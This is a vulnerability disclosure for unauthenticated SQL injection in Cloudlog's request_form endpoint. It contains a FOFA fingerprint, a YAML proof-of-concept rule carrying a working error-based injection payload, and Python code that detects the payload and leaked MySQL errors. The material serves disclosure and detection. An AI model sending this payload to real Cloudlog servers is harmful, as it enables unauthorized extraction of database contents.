Vulnerability description
The Cloudlog system has an unauthenticated SQL injection vulnerability in its request_form interface.
Attackers can exploit this vulnerability to extract information from the database.
FOFA: icon_hash="-460032467"
```yaml
id: cloudlog-request-form-sqli
info:
  name: Cloudlog Request_form SQL Injection
  author: ZacharyZcR
  severity: high
  verified: true
  description: |
    Cloudlog system has an unauthenticated SQL injection vulnerability in the request_form interface.
    Attackers can exploit this vulnerability to extract information from the database.
    FOFA: icon_hash="-460032467"
  reference:
    - https://github.com/wy876/POC/blob/main/Cloudlog/Cloudlog%E7%B3%BB%E7%BB%9Frequest_form%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  tags: cloudlog,sqli
  created: 2024/12/31
rules:
  r0:
    request:
      method: POST
      path: /index.php/oqrs/request_form
      body: station_id=1 AND (SELECT 2469 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,(SELECT (ELT(2469=2469,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    expression: response.status == 500 && response.body.bcontains(b'qbqkq1qbqkq1')
expression: r0()
```
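As an added defensive example (not part of the original PoC or of Cloudlog), the Python below decodes request_form POST bodies, rejects any station_id that is not a plain integer, flags the error-based markers of the technique the rule above uses, and checks whether a 500 response leaks the duplicate-entry text the rule's expression matches. The sample bodies and the sample response are constructed; the regexes and the 1062 error wording are assumptions about what a leaked MySQL error looks like.

```python
import re
from urllib.parse import parse_qs, quote_plus

# Constructed sample POST bodies for /index.php/oqrs/request_form (not captured traffic).
# PAYLOAD is the PoC body quoted on this page; the encoded copy shows why decoding comes first.
PAYLOAD = ("station_id=1 AND (SELECT 2469 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,"
           "(SELECT (ELT(2469=2469,1))),0x7162716b71,FLOOR(RAND(0)*2))x "
           "FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)")
SAMPLE_BODIES = ["station_id=1", PAYLOAD, "station_id=" + quote_plus(PAYLOAD[11:]), "station_id=42"]

# Markers of the error-based (duplicate-entry) technique used by the PoC payload (assumed signatures).
ERROR_BASED_MARKERS = re.compile(
    r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)|information_schema|group\s+by\s+\w+\s*\)",
    re.IGNORECASE)
# MySQL error 1062 wording whose marker string the PoC's expression looks for in a 500 response.
DUPLICATE_ENTRY = re.compile(r"Duplicate entry '([^']*)' for key", re.IGNORECASE)

def is_valid_station_id(value: str) -> bool:
    """station_id is an integer key: accept only a plain decimal, nothing else."""
    return value.isdigit()

def classify_body(body: str) -> dict:
    """Decode a form body and report whether station_id is well-formed and which markers appear."""
    params = parse_qs(body, keep_blank_values=True)  # parse_qs URL-decodes each value
    station_id = params.get("station_id", [""])[0]
    return {
        "station_id": station_id,
        "valid": is_valid_station_id(station_id),
        "markers": sorted(set(m.lower() for m in ERROR_BASED_MARKERS.findall(station_id))),
    }

def flag_suspicious(bodies) -> list:
    """Return indexes of bodies whose station_id is malformed or carries injection markers."""
    flagged = []
    for i, body in enumerate(bodies):
        result = classify_body(body)
        if not result["valid"] or result["markers"]:
            flagged.append(i)
    return flagged

def leaks_db_error(status: int, body: str) -> bool:
    """True when a 500 response exposes the duplicate-entry text (what the PoC's rule matches)."""
    return status == 500 and DUPLICATE_ENTRY.search(body) is not None

# Constructed response resembling a leaked MySQL 1062 error (not from a real Cloudlog instance).
SAMPLE_ERROR_RESPONSE = "Error Number: 1062 Duplicate entry 'qbqkq1qbqkq1' for key 'group_key'"

if __name__ == "__main__":
    for i in flag_suspicious(SAMPLE_BODIES):
        print(i, classify_body(SAMPLE_BODIES[i]))
    print(leaks_db_error(500, SAMPLE_ERROR_RESPONSE))
```

Both checks belong in front of the application: the request-side one stops the malformed parameter before it reaches the query, and the response-side one catches a deployment that still returns raw database errors to clients.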